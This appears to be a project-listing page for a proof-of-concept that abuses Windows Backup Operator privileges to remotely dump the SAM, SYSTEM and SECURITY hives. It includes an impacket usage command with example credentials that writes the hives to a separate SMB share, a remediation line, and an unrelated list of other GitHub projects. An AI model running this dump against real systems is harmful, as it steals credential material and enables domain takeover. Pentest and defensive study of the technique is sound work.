Backup dc registry - A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY

Last update: Dec 18, 2022

Related tags

Miscellaneous backup_dc_registry

Overview

Backup Operator Registry Backup to Domain Compromise

A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY hives.

Research credit to:

@filip_dragovic
Ported from @mpgn Windows PoC

Usage

This proof of concept is a modified version of impacket/examples/reg.py and will work with the most recent impacket release installed. All supported impacket authentication mechanisms will work.

[email protected]:~# python3 reg.py jsmith:'Spring2021'@10.0.229.1 backup -p '\\10.0.220.51\share'
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

Dumping SAM hive to \\10.0.220.51\share\SAM
Dumping SYSTEM hive to \\10.0.220.51\share\SYSTEM
Dumping SECURITY hive to \\10.0.220.51\share\SECURITY

Remediation:

Treat Backup Operators domain group as Domain Adminstrators and other Tier 0 resources

Owner

Horizon 3 AI Inc

AI-powered Pen Tests. See your enterprise through the eyes of an attacker & fix what matters.

GitHub Repository

Back-end API for the reternal framework

RE:TERNAL RE:TERNAL is a centralised purple team simulation platform. Reternal uses agents installed on a simulation network to execute various known

7 Apr 15, 2022

A small C compiler written in Python for learning purposes

A small C compiler written in Python. Generates x64 Intel-format assembly, which is then assembled and linked by nasm and ld.

3 Oct 22, 2021

Hartree-Fock Workshop for the Han-sur-Lesse Winterschool of 2021

Hartree-Fock course for the Han-sur-Lesse Winterschool of 2021 Requirements For going through these exercises, please install the Anaconda suite. Next

2 Nov 16, 2022

Remote execution of a simple function on the server

FunFetch Remote execution of a simple function on the server All types of Python support objects.

4 Jun 30, 2022

Python library to decorate and beautify strings

outputformater Python library to decorate and beautify your standard output 💖 I

259 Dec 13, 2022

A turtlebot auto controller allows robot to autonomously explore environment.

1 Nov 10, 2021

pythonOS: An operating system kernel made in python and assembly

pythonOS An operating system kernel made in python and assembly Wait what? It uses a custom compiler called snek that implements a part of python3.9 (

69 Dec 23, 2022

Library for mocking AsyncIOMotorClient built on top of mongomock.

mongomock-motor Best effort mock for AsyncIOMotorClient (Database, Collection, e.t.c) built on top of mongomock library. Example / Showcase from mongo

43 Jan 04, 2023

Think DSP: Digital Signal Processing in Python, by Allen B. Downey.

ThinkDSP LaTeX source and Python code for Think DSP: Digital Signal Processing in Python, by Allen B. Downey. The premise of this book (and the other

3.2k Jan 08, 2023

The Python Fuzzer that the world deserves 🐍

pip3 install frelatage Current release : 0.0.2 The Python Fuzzer that the world deserves Installation | How it works | Features | Use Frelatage | Conf

219 Dec 21, 2022

a simple thing that i made for fun :trollface:

we-do-a-little-trolling about a simple thing that i made for fun. requirements and instructions first you need to install obs , then start the virtual

6 Jul 15, 2022

Funchacks - Fun module which is a small set of utilities

funchacks 👋 Introduction Funchacks is a fun module that provides a small packag

6 Aug 04, 2022

RCCで開催する『バックエンド勉強会』の資料

RCC バックエンド勉強会開発環境 Python 3.9 Pipenv 使い方 1. インストール pipenv install 2. アプリケーションを起動 pipenv run start 本コマンドを実行するとlocalhost:8000へアクセスできるようになります。 3. テストを実行

7 Nov 14, 2021

Inspect the resources of your android projects and understand which ones are not being used and could potentially be removed.

Android Resources Checker What This program will inspect the resources of your app and help you understand which ones are not being used and could pot

39 Feb 08, 2022